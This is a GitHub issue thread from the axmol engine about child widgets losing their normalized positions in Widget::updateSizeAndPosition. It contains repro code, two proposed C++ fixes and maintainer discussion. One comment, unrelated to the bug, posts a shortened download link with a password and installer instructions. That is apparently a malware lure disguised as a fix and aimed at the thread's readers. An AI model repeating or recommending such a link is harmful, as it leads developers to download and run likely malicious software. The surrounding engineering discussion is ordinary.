### ISSUE TITLE
Incorrect child widget positions when using normalized positioning

### ISSUE THREAD

**Issue by rh101** [axmolengine/axmol#2108]
- axmol version:
- devices test on:
- developing environments
   - NDK version: r23c
   - Xcode version: 14.2+
   - Visual Studio: 
      - VS version: 2022 (17.9+)
      - MSVC version: 19.39+
      - Windows SDK version: 10.0.22621.0+
   - cmake version: 

PR #2102 has uncovered an issue in `ui::Widget`, where child nodes using normalized positioning would end up at the wrong position.  The issue seems to start in `Widget::setContentSize(const Vec2& contentSize)`, where the final call in that method is to `onSizeChanged();`, which in turn ends up calling `updateSizeAndPosition()` on all child nodes.  

Example code to reproduce the issue:
```
auto baseLayout = ax::ui::Layout::create();
baseLayout->setContentSize(Vec2(400, 400));
contentLayout->setBackGroundColorType(ax::ui::Layout::BackGroundColorType::SOLID);
contentLayout->setBackGroundColor(ax::Color3B::RED);
baseLayout->setLayoutType(ax::ui::Layout::Type::ABSOLUTE);
this->addChild(baseLayout);

auto contentLayout = ax::ui::Layout::create();
contentLayout->setLayoutType(ax::ui::Layout::Type::RELATIVE);
contentLayout->setAnchorPoint(ax::Vec2::ANCHOR_MIDDLE_TOP);
contentLayout->setPositionNormalized(ax::Vec2(0.5f, 1.f));
contentLayout->setBackGroundColorType(ax::ui::Layout::BackGroundColorType::SOLID);
contentLayout->setBackGroundColor(ax::Color3B::GREEN);
baseLayout->addChild(contentLayout);

contentLayout->setContentSize(Vec2(200, 200)); // this triggers the issue
```

The problem is this section:

```
void Widget::updateSizeAndPosition(const Vec2& parentSize)
{
...
        Vec2 absPos = getPosition();
        switch (_positionType)
        {
        case PositionType::ABSOLUTE:
        {
            if (parentSize.width <= 0.0f || parentSize.height <= 0.0f)
            {
                _positionPercent.setZero();
            }
            else
            {
                _positionPercent.set(absPos.x / parentSize.width, absPos.y / parentSize.height);
            }
            break;
        }
        case PositionType::PERCENT:
        {
            absPos.set(parentSize.width * _positionPercent.x, parentSize.height * _positionPercent.y);
            break;
        }
        default:
            break;
        }
        setPosition(absPos);
...
```

On the line `Vec2 absPos = getPosition();`, the actual position is still `0,0`, since the normalized position has not yet been calculated for that widget, so when it gets to `setPosition(absPos);`, it effectively overwrites the position with `0,0`, and sets `_usingNormalizedPosition` to `false`.  So, when it finally gets to this section during rendering, the real normalized position is never used, since `_usingNormalizedPosition` is `false`:

```
uint32_t Node::processParentFlags(const Mat4& parentTransform, uint32_t parentFlags)
{
    if (_usingNormalizedPosition)
    {
        AXASSERT(_parent, "setPositionNormalized() doesn't work with orphan nodes");
        if ((parentFlags & FLAGS_CONTENT_SIZE_DIRTY) || _normalizedPositionDirty)
        {
            auto& s           = _parent->getContentSize();
            _position.x       = _normalizedPosition.x * s.width;
            _position.y       = _normalizedPosition.y * s.height;
            _transformUpdated = _transformDirty = _inverseDirty = true;
            _normalizedPositionDirty                            = false;
        }
    }
...
}
```

Right now I can think of 2 ways to fix this. One is to add logic to detect if the widget is using normalized positioning, and if so, use those methods instead, as follows:

**Solution 1:**
```
void Widget::updateSizeAndPosition(const Vec2& parentSize)
{
...
    // update position & position percent
    if (_usingNormalizedPosition)
    {
        Vec2 absPos = getNormalizedPosition();
        switch (_positionType)
        {
        case PositionType::ABSOLUTE:
        {
            if (parentSize.width <= 0.0f || parentSize.height <= 0.0f)
            {
                _positionPercent.setZero();
            }
            else
            {
                _positionPercent.set(absPos.x, absPos.y);
            }
            break;
        }
        case PositionType::PERCENT:
        {
            absPos.set(_positionPercent.x, _positionPercent.y);
            break;
        }
        default:
            break;
        }
        setPositionNormalized(absPos);
    }
    else
    {
        Vec2 absPos = getPosition();
        switch (_positionType)
        {
        case PositionType::ABSOLUTE:
        {
            if (parentSize.width <= 0.0f || parentSize.height <= 0.0f)
            {
                _positionPercent.setZero();
            }
            else
            {
                _positionPercent.set(absPos.x / parentSize.width, absPos.y / parentSize.height);
            }
            break;
        }
        case PositionType::PERCENT:
        {
            absPos.set(parentSize.width * _positionPercent.x, parentSize.height * _positionPercent.y);
            break;
        }
        default:
            break;
        }
        setPosition(absPos);
    }
}

// and...

void Widget::setPositionPercent(const Vec2& percent)
{
    if (_usingLayoutComponent)
    {
        auto component = this->getOrCreateLayoutComponent();
        component->setPositionPercentX(percent.x);
        component->setPositionPercentY(percent.y);
        component->refreshLayout();
    }
    else
    {
        _positionPercent = percent;
        if (_running)
        {
            Widget* widgetParent = getWidgetParent();
            if (widgetParent)
            {
                Vec2 parentSize = widgetParent->getContentSize();
                if (_usingNormalizedPosition)
                {
                    Vec2 absPos(_positionPercent.x, _positionPercent.y);
                    setPositionNormalized(absPos);
                }
                else
                {
                    Vec2 absPos(parentSize.width * _positionPercent.x, parentSize.height * _positionPercent.y);
                    setPosition(absPos);
                }
            }
        }
    }
}
```

Or, alternatively, we can force the calculation of the position from the normalized values prior to using them, and turn off normalized positioning.  This change would only affect `Widget::updateSizeAndPosition`, with no need to update `Widget::setPositionPercent`:

**Solution 2:**
```
void Widget::updateSizeAndPosition(const Vec2& parentSize)
{
    ...

    Vec2 absPos;
    if (_usingNormalizedPosition && _normalizedPositionDirty)
    {
        absPos.x = _normalizedPosition.x * parentSize.width;
        absPos.y = _normalizedPosition.y * parentSize.height;
    }
    else
    {
        absPos = getPosition();
    }

    // update position & position percent
    switch (_positionType)
    {
    case PositionType::ABSOLUTE:
    {
        if (parentSize.width <= 0.0f || parentSize.height <= 0.0f)
        {
            _positionPercent.setZero();
        }
        else
        {
            _positionPercent.set(absPos.x / parentSize.width, absPos.y / parentSize.height);
        }
        break;
    }
    case PositionType::PERCENT:
    {
        absPos.set(parentSize.width * _positionPercent.x, parentSize.height * _positionPercent.y);
        break;
    }
    default:
        break;
    }
    setPosition(absPos);
}
```

So, the first solution maintains normalized positioning, while the alternative keeps the current behavior, which turns normalized positioning off, but now calculates the values correctly. 

Which is preferred? First or second solution? Or does anyone have an alternative suggestion?

_Originally posted by @rh101 in https://github.com/axmolengine/axmol/issues/2102#issuecomment-2312937733_

**Comment by smilediver** [comment]
Note that it overrides `virtual void setPosition(const Vec2& pos) override;` (which is also wrong, since it should override `setPosition(float x, float y)` instead). So maybe it needs to override `setPositionNormalized()` too. Maybe those overrides should set `_positionType`?

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by rh101** [comment]
> Note that it overrides `virtual void setPosition(const Vec2& pos) override;` (which is also wrong, since it should override `setPosition(float x, float y)` instead). So maybe it needs to override `setPositionNormalized()` too.

Yes it is strange how it has been implemented. I'll address all those issues in a PR.

**Comment by smilediver** [comment]
Quick fix I think could be to override `setPositionNormalized()` and setting there `_positionType` and `_positionPercent`, and restoring previous `_usingNormalizedPosition` in `setPosition()` override.

**Comment by rh101** [comment]
> Quick fix I think could be to override `setPositionNormalized()` and setting there `_positionType` and `_positionPercent`, and restoring previous `_usingNormalizedPosition` in `setPosition()` override.

I'll try this out.

**Comment by smilediver** [comment]
But calling `widget->setPosition()` should probably switch back to `PositionType::ABSOLUTE`... It feels that `_positionType` and `_positionPercent` only complicates the logic. Maybe it would be easier to remove them and rely solely on `_usingNormalizedPosition` and `_normalizedPosition`.

**Comment by rh101** [comment]
> But calling `widget->setPosition()` should probably switch back to `PositionType::ABSOLUTE`... It feels that `_positionType` and `_positionPercent` only complicates the logic.

That's the exact issue I'm facing right now.  As soon as `setPositionNormalized` was overriden and changes applied, other methods needed to also be updated, and it started cascading from there, almost like an entire re-write of the logic, which I definitely do not want to do.

> Maybe it would be easier to remove them and rely solely on `_usingNormalizedPosition` and `_normalizedPosition`.

Yes, this does seem to be the simpler fix for the time being.
